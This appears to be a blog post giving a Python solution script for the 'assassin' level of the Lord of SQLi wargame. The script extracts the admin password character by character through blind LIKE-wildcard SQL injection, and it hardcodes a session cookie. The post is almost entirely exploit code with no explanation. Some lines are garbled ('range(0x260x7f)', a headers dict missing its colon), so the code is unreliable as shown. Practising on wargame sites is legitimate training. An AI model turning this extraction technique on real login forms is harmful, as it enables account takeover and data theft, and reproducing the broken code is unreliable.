Web hacking/LOS

[LOS] - assassin - 190825

WS-_K 2019. 8. 25. 18:01

1. assassin.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
import requests
 
URL = 'https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php'
tmp_password_gadget = ''
 
password = ''
index=0
#strpassword= ''
while True:
        try:
                guest = False                
                isit = False
                index += 1
                print('[+]Finding Password index : %d'%index)
                for i in range(0x260x7f):
                        # ?pw=a%
                        query = '{0}{1}%'.format(password,chr(i))
                        
                        paramDic ={
                                'pw':
                                query
                                }
                        print('[*]Sending Query : %s'%query)
                        headers = {'Content-Type''application/json; charset=utf-8'}
                        cookies = {'PHPSESSID':'55qd5ir9ikt4u82se0n2i9qt5b'}
                        
                        response = requests.get(URL, params=paramDic, headers=headers, cookies=cookies)
                        
                        if "Hello admin" in response.text:
                                password += chr(i)
                                #strpassword += hex(i).replace('0x', '')
                                isit = True        
                                print('[+]Find Password : %s Index : %d' %(chr(i), index))
                                break
                        
                        if "Hello guest" in response.text:
                                tmp_password_gadget = chr(i)
                                guest = True
                                print('[+]Detect Hello gueset... Collect gadget...')
                        
                
                        
                if guest is False and isit is False:
                        break
                
                elif guest is True and isit is False:
                        password += tmp_password_gadget
                        print('[+]Find Password : %s Index : %d' %(tmp_password_gadget, index))
                
                
        except KeyboardInterrupt:
                break
 
print('\n[+]Password : %s'%password)
 
http://colorscripter.com/info#e" target="_blank" style="color:#4f4f4ftext-decoration:none">Colored by Color Scripter
댓글수0